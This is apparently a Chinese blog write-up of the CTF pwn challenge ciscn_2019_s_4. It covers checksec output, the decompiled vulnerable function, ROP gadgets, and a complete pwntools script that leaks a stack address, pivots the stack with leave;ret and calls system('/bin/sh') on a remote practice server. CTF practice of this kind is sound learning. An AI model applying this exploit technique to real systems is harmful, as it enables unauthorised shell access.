加载头像

ciscn_2019_s_4

Ubuntu 18


0x01


checksec

1
2
3
4
5
6
[*] '/home/zelas/Desktop/pwn/ciscn_2019_s_4/ciscn_s_4'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled //
PIE: No PIE (0x8048000)

IDA

vul()

1
2
3
4
5
6
7
8
9
10
int vul()
{
char s[40]; // [esp+0h] [ebp-28h] BYREF

memset(s, 0, 0x20u);
read(0, s, 0x30u);
printf("Hello, %s\n", s);
read(0, s, 0x30u);
return printf("Hello, %s\n", s);
}

可疑函数hack()

1
2
3
4
int hack()
{
return system("echo flag");
}

0x02


思路

s = 0x28 read可以接受0x30 0x30-0x28-0x4 = 4 只够填充调用了,无法加上参数

1
2
3
4
5
6
7
8
─$ ROPgadget --binary ciscn_s_4 --only "leave|ret"  
Gadgets information
============================================================
0x080484b8 : leave ; ret
0x080483a6 : ret
0x080484ce : ret 0xeac1

Unique gadgets found: 3

利用第一次read()溢出泄露出栈上的地址

计算rbp与buf之间的偏移 gdb动调 偏移为0x38

布置栈,发送/bin/sh

0x03

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
from pwn import *

context(os='linux', arch='i386', log_level='debug')
path = './'
io = remote('node4.buuoj.cn', 28684)
# io = process([path])
# libc =
# elf = ELF(path)

payload = flat(b'a' * 0x24, b'b'*4)
io.sendafter(b'name?', payload)
stack = u32(io.recvuntil(b'\xff')[-4:])
print('[+] stack_address -->', hex(stack))
system = 0x8048400
leave_ret = 0x080484b8 # leave ; ret
buf = stack - 0x38
payload1 = flat(system, b'a' * 4, buf + 12, b'/bin/sh\x00', b'a' * 20, buf - 0x4, leave_ret)
io.sendline(payload1)
io.interactive()


评论
✅ 你无需删除空行,直接评论以获取最佳展示效果
引用到评论
随便逛逛博客分类文章标签
复制地址关闭热评深色模式轉為繁體